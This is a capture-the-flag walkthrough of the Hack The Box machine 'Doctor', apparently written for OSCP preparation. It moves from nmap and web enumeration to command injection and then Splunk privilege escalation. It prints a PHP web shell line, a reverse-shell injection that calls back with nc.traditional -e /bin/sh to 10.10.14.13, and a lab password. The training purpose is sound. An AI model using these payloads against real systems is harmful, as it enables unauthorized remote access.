OSCP PREPROTİONS – HTB Doctor

Doctor machine is a vulnerable machine with Linux operating system among retired machines. We are expected to obtain user and root flags using these vulnerabilities.
Let’s run a network scan with nmap to recognize the target machine

Classic Scan

Full Port Scan

As a result of network scanning, 22/tcp ssh OpenSSH 8.2, 80/tcp http Apache httpd, 8089/tcp ssl/http Splunkd ports are open.
Since port 80 is open, we continue via browser to perform web enumueration.

We have performed enumeration on the web, we have not obtained enough information, we are performing directory and file scans with gobuster

We did not find any results in Gobuster scanning. So much inconclusiveness 😊 We provide web ebumeration again in case there is something overlooked, info@doctors.htb attracts our attention on the main page.

Here we edit the /etc/hosts file and access the site again.

After editing here, we access doctors.htb, where we are greeted by the login page

Default passwords are waving and we can’t log in. I registr myself in the Registry tab

Let’s log in to the login screen with the user we created

After logging in, we continue enumeration

We looked at the source code, looked at the developer mode, did a gobuster directory scan and got no significant results.
Here we performed emueration on the interface (to detect a corruption in the input or url values)
Here we see the New Message section as the input field, let’s add here

Adding can be done. Let’s add input values outside the normal flow here in the attacker’s head

Adding can be done. Let’s add input values outside the normal flow here in the attacker’s head

Adding can be done. Let's add input values outside the normal flow here in the attacker's head
<script>alert("hi")</script>
<?php system($_GET['cmd']);?>
whoami
pwd
commands were added, but no input value was received in the input response.

These commands do not give an output in response to any input value, let’s check the interaction using curl to see if the commands are working

As you can see, the command is working here. Let’s try to get ourselves a revershell here
curl http://10.10.14.13/$(nc.traditional$IFS-e/bin/sh$IFS’10.10.14.13’$IFS’4747′)
We are trying to get reversehll using the command

We have our shell with low privileges so we need to perform a ptivilige escalaiton.
We provide local enumeration by passing the Linpeas tool

Here the backup file attracted our attention when we looked for passowrd information in it.

Obtained password for user Shaun
And we were able to get our user flag.
Since we don’t have access to the /root directory, we continue with enumeration.

linpeas.sh did not give us detailed information, and in local enumeration we could not get any information from the files. There was a splunkd service here, let’s try to connect to it

Here it gives a version warning
When we clicked on Services it asked us for credentials shaun:We were able to log in using Guitar123 credentials.

There was a lot of tab screen in Services
First, let’s start with the version and see if there is an exploit or not

We saw that there is an RCE vulnerability

We dowloand the exploit code on Github

Let’s try to run the Python code

This is how we got root authorization.